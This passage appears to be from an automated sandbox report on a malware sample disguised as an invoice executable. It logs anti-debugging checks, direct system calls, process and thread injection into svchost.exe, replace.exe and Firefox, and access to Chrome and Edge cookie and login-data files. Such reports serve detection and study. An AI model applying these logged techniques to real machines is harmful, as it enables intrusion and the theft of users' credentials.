Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386CA24 mov eax, dword ptr fs:[00000030h]	2_2_0386CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385EA2E mov eax, dword ptr fs:[00000030h]	2_2_0385EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03854A35 mov eax, dword ptr fs:[00000030h]	2_2_03854A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03854A35 mov eax, dword ptr fs:[00000030h]	2_2_03854A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386CA38 mov eax, dword ptr fs:[00000030h]	2_2_0386CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]	2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]	2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]	2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]	2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]	2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]	2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]	2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840A5B mov eax, dword ptr fs:[00000030h]	2_2_03840A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840A5B mov eax, dword ptr fs:[00000030h]	2_2_03840A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]	2_2_0386CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]	2_2_0386CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]	2_2_0386CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DEA60 mov eax, dword ptr fs:[00000030h]	2_2_038DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038ACA72 mov eax, dword ptr fs:[00000030h]	2_2_038ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038ACA72 mov eax, dword ptr fs:[00000030h]	2_2_038ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038309AD mov eax, dword ptr fs:[00000030h]	2_2_038309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038309AD mov eax, dword ptr fs:[00000030h]	2_2_038309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B89B3 mov esi, dword ptr fs:[00000030h]	2_2_038B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B89B3 mov eax, dword ptr fs:[00000030h]	2_2_038B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B89B3 mov eax, dword ptr fs:[00000030h]	2_2_038B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C69C0 mov eax, dword ptr fs:[00000030h]	2_2_038C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038649D0 mov eax, dword ptr fs:[00000030h]	2_2_038649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FA9D3 mov eax, dword ptr fs:[00000030h]	2_2_038FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BE9E0 mov eax, dword ptr fs:[00000030h]	2_2_038BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038629F9 mov eax, dword ptr fs:[00000030h]	2_2_038629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038629F9 mov eax, dword ptr fs:[00000030h]	2_2_038629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE908 mov eax, dword ptr fs:[00000030h]	2_2_038AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE908 mov eax, dword ptr fs:[00000030h]	2_2_038AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BC912 mov eax, dword ptr fs:[00000030h]	2_2_038BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03828918 mov eax, dword ptr fs:[00000030h]	2_2_03828918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03828918 mov eax, dword ptr fs:[00000030h]	2_2_03828918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B892A mov eax, dword ptr fs:[00000030h]	2_2_038B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C892B mov eax, dword ptr fs:[00000030h]	2_2_038C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B0946 mov eax, dword ptr fs:[00000030h]	2_2_038B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904940 mov eax, dword ptr fs:[00000030h]	2_2_03904940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03856962 mov eax, dword ptr fs:[00000030h]	2_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03856962 mov eax, dword ptr fs:[00000030h]	2_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03856962 mov eax, dword ptr fs:[00000030h]	2_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0387096E mov eax, dword ptr fs:[00000030h]	2_2_0387096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0387096E mov edx, dword ptr fs:[00000030h]	2_2_0387096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0387096E mov eax, dword ptr fs:[00000030h]	2_2_0387096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D4978 mov eax, dword ptr fs:[00000030h]	2_2_038D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D4978 mov eax, dword ptr fs:[00000030h]	2_2_038D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BC97C mov eax, dword ptr fs:[00000030h]	2_2_038BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830887 mov eax, dword ptr fs:[00000030h]	2_2_03830887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BC89D mov eax, dword ptr fs:[00000030h]	2_2_038BC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E8C0 mov eax, dword ptr fs:[00000030h]	2_2_0385E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039008C0 mov eax, dword ptr fs:[00000030h]	2_2_039008C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FA8E4 mov eax, dword ptr fs:[00000030h]	2_2_038FA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0386C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0386C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BC810 mov eax, dword ptr fs:[00000030h]	2_2_038BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]	2_2_03852835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]	2_2_03852835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]	2_2_03852835

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe

Code function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

0_2_004238DA

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_0041F250 SetUnhandledExceptionFilter,	0_2_0041F250
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0041A208
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00417DAA

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	NtAllocateVirtualMemory: Direct from: 0x76EF48EC	Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	NtQueryAttributesFile: Direct from: 0x76EF2E6C	Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C	Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	NtQuerySystemInformation: Direct from: 0x76EF48CC	Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	NtOpenSection: Direct from: 0x76EF2E0C	Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	NtDeviceIoControlFile: Direct from: 0x76EF2AEC	Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BEC	Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	NtQueryInformationToken: Direct from: 0x76EF2CAC	Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	NtCreateFile: Direct from: 0x76EF2FEC	Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	NtOpenFile: Direct from: 0x76EF2DCC	Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	NtTerminateThread: Direct from: 0x76EF2FCC	Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	NtOpenKeyEx: Direct from: 0x76EF2B9C	Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	NtSetInformationProcess: Direct from: 0x76EF2C5C	Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	NtProtectVirtualMemory: Direct from: 0x76EF2F9C	Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	NtWriteVirtualMemory: Direct from: 0x76EF2E3C	Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	NtNotifyChangeKey: Direct from: 0x76EF3C2C	Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	NtCreateMutant: Direct from: 0x76EF35CC	Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	NtResumeThread: Direct from: 0x76EF36AC	Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	NtMapViewOfSection: Direct from: 0x76EF2D1C	Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BFC	Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	NtQuerySystemInformation: Direct from: 0x76EF2DFC	Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	NtReadFile: Direct from: 0x76EF2ADC	Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	NtDelayExecution: Direct from: 0x76EF2DDC	Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	NtQueryInformationProcess: Direct from: 0x76EF2C26	Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	NtResumeThread: Direct from: 0x76EF2FBC	Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	NtCreateUserProcess: Direct from: 0x76EF371C	Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	NtAllocateVirtualMemory: Direct from: 0x76EF3C9C	Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	NtWriteVirtualMemory: Direct from: 0x76EF490C	Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	NtSetInformationThread: Direct from: 0x76EE63F9	Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	NtClose: Direct from: 0x76EF2B6C
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	NtSetInformationThread: Direct from: 0x76EF2B4C	Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	NtReadVirtualMemory: Direct from: 0x76EF2E8C	Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	NtCreateKey: Direct from: 0x76EF2C6C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\replace.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: NULL target: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: NULL target: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\replace.exe

Thread register set: target process: 6496

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\replace.exe

Thread APC queued: target process: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2CEE008

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe

Code function: 0_2_00436CD7 LogonUserW,

0_2_00436CD7

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe

0_2_0040D590

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe

Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00434418

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe

Code function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,

0_2_0043333C

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Revised Invoice H000127896.exe"	Jump to behavior
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe	Process created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe

Code function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00446124

Source: MUjPkRkjOWKkX.exe, 00000004.00000002.3292308483.0000000001231000.00000002.00000001.00040000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000004.00000000.2444157765.0000000001231000.00000002.00000001.00040000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000007.00000002.3292749248.00000000016B1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: Revised Invoice H000127896.exe, MUjPkRkjOWKkX.exe, 00000004.00000002.3292308483.0000000001231000.00000002.00000001.00040000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000004.00000000.2444157765.0000000001231000.00000002.00000001.00040000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000007.00000002.3292749248.00000000016B1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: MUjPkRkjOWKkX.exe, 00000004.00000002.3292308483.0000000001231000.00000002.00000001.00040000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000004.00000000.2444157765.0000000001231000.00000002.00000001.00040000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000007.00000002.3292749248.00000000016B1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: MUjPkRkjOWKkX.exe, 00000004.00000002.3292308483.0000000001231000.00000002.00000001.00040000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000004.00000000.2444157765.0000000001231000.00000002.00000001.00040000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000007.00000002.3292749248.00000000016B1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: Revised Invoice H000127896.exe	Binary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe

Code function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,

0_2_004720DB

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe

Code function: 0_2_00472C3F GetUserNameW,

0_2_00472C3F

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe

Code function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,SetOaNoCache,

0_2_0041E364

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe

Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,

0_2_0040E500

Stealing of Sensitive Information

Tries to harvest and steal browser information (history, passwords, etc)

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2536793601.0000000008050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3292716261.0000000003D00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3291336208.0000000002120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2532355748.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3292632667.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2532985374.0000000004FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3292694436.0000000002820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3292411346.0000000001220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\replace.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
